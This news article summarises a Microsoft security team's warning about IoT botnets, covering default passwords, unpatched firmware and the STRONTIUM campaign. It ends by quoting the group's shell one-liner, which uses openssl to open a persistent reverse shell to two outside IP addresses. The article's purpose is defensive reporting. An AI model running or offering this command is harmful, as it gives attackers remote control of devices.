The Microsoft Security Research and Defense (MSRD) team has issued a cybersecurity warning about the growing concerns of IoT (Internet-of-Things) security, especially botnet infections in their official blog. Redmond highlighted that IoT devices is forecasted to grow as much as 50-billion installations globally, with many devices having identified with security and privacy flaws fresh from the factory. This includes built-in telemetry data that respective vendors installed on their devices, usually useful for troubleshooting, but also leaks not only user data but also spatial data.
Redmond also underscored certain families of malware that are targeting the IoT devices, including Mirai botnet of 2016 and VPN Filter infection proliferation in 2018. Microsoft also invoked how IoT devices deployed in the last 2018 Olympics became defenseless targets of hackers. This includes the very printers used for mass-producing the tickets for the event and the media center for domestic and foreign journalists.
Just like full-fledged desktop computers, laptops and smartphones, the weakest link in IoT devices’ cybersecurity are also the way they are deployed. Many IoT devices operate in production still maintain and use the factory default usernames and passwords. These device-default credentials are there for ease of deployment, but system administrators should make sure that they change it immediately before the installation is complete in order to prevent unauthorized access to its configuration.
Microsoft also brought-up the bad habit of device maintainers of not upgrading the firmware for IoT devices, something that creates a loophole to an otherwise secure deployment procedure. Redmond is keen on forcibly pushing the updates to their Windows desktop operating system, even to the annoyance of their customer base. Seems like the same treatment for IoT is in order, as the users and even the system administrators will not do it themselves, the devices need to auto-update.
“While much of the industry focuses on the threats of hardware implants, we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments,” explained the MSRD team.
After the 2018 VPN Filter, Redmond has expressed concerned about the strong campaign of a IoT-targeted attacked they dubbed as STRONTIUM. The company has already established contacts with both private and public sectors globally with 1400+ notifications, warning the recipients to monitor their devices for possible infection. “The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry,” added the MSRD team.
MSRD enumerated the following public IPv4 addresses as the Command and Control servers of STRONTIUM:
While the following is the exact script which STRONTIUM uses to install itself to IoT, the code presented keeps itself running in the background even after a power-cycle:
export [IOT Device] =”-qws -display :1 -nomouse”
echo 1|tee /tmp/.c;sh -c ‘(until (sh -c “openssl s_client -quiet -host 220.127.116.11 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 18.104.22.168 -port 443”); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &